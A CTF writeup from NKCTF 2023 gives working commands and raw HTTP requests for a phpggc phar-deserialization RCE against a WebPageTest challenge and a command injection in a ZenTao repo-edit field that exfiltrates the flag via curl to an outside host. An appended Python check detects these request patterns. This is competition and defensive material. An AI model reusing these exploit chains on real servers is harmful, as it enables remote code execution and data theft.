NKCTF 2023 Writeup By AheadSec
Thanks to every member of the team for the hard work~

Web: Nacl, monkey111
Misc: Nacl, mochu7
Social Engineering: Nacl, monkey111, mochu7
Crypto: range
Pwn: gwoo, Helen
Reverse: Helen

webpagetest deserialization

First, download https://github.com/ambionics/phpggc.git

Then php.ini needs to be changed:

[Phar]
phar.readonly => Off

Then generate the payload and send it:

./phpggc Monolog/RCE2 system 'cat /f*' -p phar -o testinfo.ini
URLENC_PAYLOAD=$(cat /tmp/testinfo.ini | xxd -p | tr -d "\n" | sed "s#..#%&#g")
curl -sSkig 'http://d44a0e24-e51d-4dae-976f-7583b5bcb409.node2.yuzhian.com.cn/runtest.php' -d 'rkey=gadget' -d "ini=$URLENC_PAYLOAD" -o -
curl -sSkig 'http://d44a0e24-e51d-4dae-976f-7583b5bcb409.node2.yuzhian.com.cn/runtest.php' -d 'rkey=phar:///var/www/html/results/gadget./testinfo.ini/foo' -d "ini=$URLENC_PAYLOAD" -o -

The commands above must be run in order, and none of them may produce an error.

Obtain the cookie:

POST /repo-create.html HTTP/1.1
Host: b11ff344-b071-4efb-9e1b-ddc949f7a9fb.node.yuzhian.com.cn:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: zh-CN,zh;q=0.9
Cookie: zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://b11ff344-b071-4efb-9e1b-ddc949f7a9fb.node.yuzhian.com.cn:8000//repo-edit-1-0.html
Content-Length: 111

product%5B%5D=1&SCM=Gitlab&name=66666&path=&encoding=utf-8&client=&account=&password=&encrypt=base64&desc=&uid=

Execute the command. The response does not echo enough of the output, so curl is used to send it out-of-band:

POST /repo-edit-10000-10000.html HTTP/1.1
Host: b11ff344-b071-4efb-9e1b-ddc949f7a9fb.node.yuzhian.com.cn:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: zh-CN,zh;q=0.9
Cookie: zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://b11ff344-b071-4efb-9e1b-ddc949f7a9fb.node.yuzhian.com.cn:8000//repo-edit-1-0.html
Content-Length: 85

SCM=Subversion&client=`curl 1x.x.x.x:8080/\`cat /flag | sed -n '2p' | base64\``
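
A defender-side check for the request patterns in this writeup, as an added example that is not part of the original writeup or of either application's code: it flags a PHP stream wrapper in a form value (the `rkey` case), a phar stub in uploaded content (the `ini` case) and shell command substitution (the `client` case). The names `inspect_form`, `scan_samples` and `SAMPLES` are assumptions, and the sample bodies are constructed.

```python
import re
from urllib.parse import parse_qsl

# PHP stream wrappers that should never lead a user-supplied key or path.
WRAPPER_RE = re.compile(r"\s*(phar|php|zip|data|expect|glob|compress\.\w+)://", re.I)
# Shell command substitution: backticks or $( ... ).
SUBST_RE = re.compile(r"`|\$\(")
# Every phar archive carries a stub that contains this token.
PHAR_STUB = b"__HALT_COMPILER();"


def inspect_form(body: str) -> list:
    """Return (parameter, finding) pairs for one urlencoded POST body."""
    findings = []
    # latin-1 maps each percent-decoded byte to one character, so binary survives.
    for name, value in parse_qsl(body, keep_blank_values=True, encoding="latin-1"):
        if WRAPPER_RE.match(value):
            findings.append((name, "stream-wrapper"))
        if SUBST_RE.search(value):
            findings.append((name, "command-substitution"))
        if PHAR_STUB in value.encode("latin-1", "replace"):
            findings.append((name, "phar-stub"))
    return findings


# Constructed sample bodies, shaped like the requests shown in the writeup.
SAMPLES = {
    "upload": "rkey=gadget&ini=%3C%3Fphp%20__HALT_COMPILER%28%29%3B%20%3F%3E%0D%0A%00%01",
    "trigger": "rkey=phar%3A%2F%2F%2Fvar%2Fwww%2Fhtml%2Fresults%2Fgadget.%2Ftestinfo.ini%2Ffoo&ini=x",
    "client": "SCM=Subversion&client=%60id%60",
    "benign": "product%5B%5D=1&SCM=Gitlab&name=66666&path=&encoding=utf-8",
}


def scan_samples() -> dict:
    """Run the check over every constructed sample body."""
    return {label: inspect_form(body) for label, body in SAMPLES.items()}


if __name__ == "__main__":
    for label, hits in scan_samples().items():
        print(f"{label:8} {hits}")
```

Pattern matching like this is a tripwire for request logs or a proxy rule. The application-side fix is to keep request parameters out of filesystem paths and shell command lines.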